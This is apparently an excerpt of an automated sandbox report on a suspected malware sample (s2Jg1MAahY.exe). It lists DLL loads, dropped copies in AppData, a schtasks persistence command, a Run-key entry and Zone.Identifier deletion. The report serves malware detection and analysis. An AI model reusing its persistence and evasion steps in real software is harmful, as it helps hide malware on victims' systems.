                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iconcodecservice.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: s2Jg1MAahY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: s2Jg1MAahY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_0143E9B8 pushfd ; retf 0_2_0143E9B9
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 0_2_0143DBE4 pushfd ; ret 0_2_0143DBED
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeCode function: 8_2_018E0C55 push edi; retf 8_2_018E0C7A
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0180E9B8 pushfd ; retf 9_2_0180E9B9
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0180F550 pushad ; iretd 9_2_0180F559
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0180DBE4 pushfd ; ret 9_2_0180DBED
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E8EA8 push ds; ret 9_2_0B5E8EAA
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E905B push ds; ret 9_2_0B5E9062
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E9019 push ds; ret 9_2_0B5E902A
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 9_2_0B5E8511 push ss; ret 9_2_0B5E8512
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeCode function: 13_2_02C3F8E8 pushad ; retf 13_2_02C3F8F1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_01A0E9B8 pushfd ; retf 15_2_01A0E9B9
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 15_2_01A0DBE4 pushfd ; ret 15_2_01A0DBED
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_0187F7C8 pushad ; retf 19_2_0187F7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_01870C55 push edi; retf 19_2_01870C7A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_02A2E9B8 pushfd ; retf 22_2_02A2E9B9
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 22_2_02A2DBE4 pushfd ; ret 22_2_02A2DBED
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0682BB91 push ds; retf 0006h25_2_0682BB92
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0682BBB1 push ds; retf 0006h25_2_0682BBB2
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 25_2_0682B9A9 push ds; retf 0006h25_2_0682B9AA
                    Source: s2Jg1MAahY.exeStatic PE information: section name: .text entropy: 7.636878369806903
                    Source: GedTanqRR.exe.0.drStatic PE information: section name: .text entropy: 7.636878369806903
                    Source: sgxIb.exe.8.drStatic PE information: section name: .text entropy: 7.636878369806903
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeFile created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJump to dropped file
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeFile created: C:\Users\user\AppData\Roaming\GedTanqRR.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpF8DD.tmp"
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
